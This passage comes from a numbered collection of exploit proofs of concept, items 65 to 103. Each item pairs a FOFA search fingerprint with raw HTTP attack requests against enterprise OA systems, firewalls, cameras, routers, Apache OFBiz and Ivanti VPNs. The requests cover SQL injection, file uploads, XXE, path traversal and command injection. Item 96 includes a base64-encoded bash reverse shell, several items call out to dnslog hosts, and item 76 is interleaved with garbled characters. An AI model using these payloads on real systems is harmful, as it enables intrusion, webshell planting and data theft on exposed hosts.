      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>


65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators


66. 万户 (Wanhu) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The vulnerability is confirmed if lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9


67. 万户 (Wanhu) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the file to write, dir gives the directory it is written to, and fileType gives the file extension
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 (Wanhu) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


69. 万户 (Wanhu) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


70. 万户 (Wanhu) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD


71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1


72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E


73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD


74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD


75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x


* Y/ \6 N, p2 ^/ M76. 新开普掌上校园服务管理平台service.action远程命令执行! M5 H# F4 F8 j
FOFA:title="掌上校园服务管理平台"% J& W( e" ~% Y. o
POST /service_transport/service.action HTTP/1.1: v, M3 N( _# R. \$ I* {
Host: x.x.x.x" p* i8 L9 ~& L. e& P( t7 |0 @  c2 A! q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
; {% H5 i, p  f6 j( mConnection: close* z" P: [$ ^8 Q3 ~) l- p& Y/ }
Content-Length: 211
# }! D  b0 h& H& g& pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 Q+ F0 E) F) P8 S# a6 b6 [" ?. |  sAccept-Encoding: gzip, deflate
3 w, ~# k6 L6 W, U! ^6 RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. q$ \) t  f( o) Q; G& A5 L  B0 JCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
$ w- ?+ {0 s" J% h! N! rUpgrade-Insecure-Requests: 1% A3 O, f$ l3 z+ S3 A8 I6 f8 |

& I& r3 P8 T. q{: a0 C! V0 m6 m( T5 a* e
"command": "GetFZinfo",
5 H! d! j- `0 H" A  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
9 D1 g) D* q. Y  [8 m- i  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"! _( q6 \1 g* L9 t7 _
}6 V; C# T+ |$ R. G, [% \
$ C6 m% z3 o9 L/ z! |( d8 Y

' V3 B3 d! i4 y8 _6 XGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1+ J2 u9 Q0 e2 f2 V- |" I
Host: x.x.x.x
8 [' e% o0 W% Q; r) {! |  A" O7 r9 G0 @

# P+ z" G% a1 B; P3 N9 `7 l9 o. B8 r" r9 c6 `9 u( ]5 I
77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE 百为 flow-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost


83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD


84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}


85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it writes a Godzilla (哥斯拉) webshell
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Webshell URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping


87. 安恒 (DBAppSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 (DBAppSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+


90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig


91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD


93. 奇安信 (QiAnXin) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


94. Qi'anxin Wangshen (奇安信网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>
  <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
    <ds:SignedInfo>
      <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>
      <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
    </ds:SignedInfo>
    <<ds:SignatureValue>qwerty</ds:SignatureValue>
    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>
    </ds:KeyInfo>
    <ds:Object></ds:Object>
  </ds:Signature>
</soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
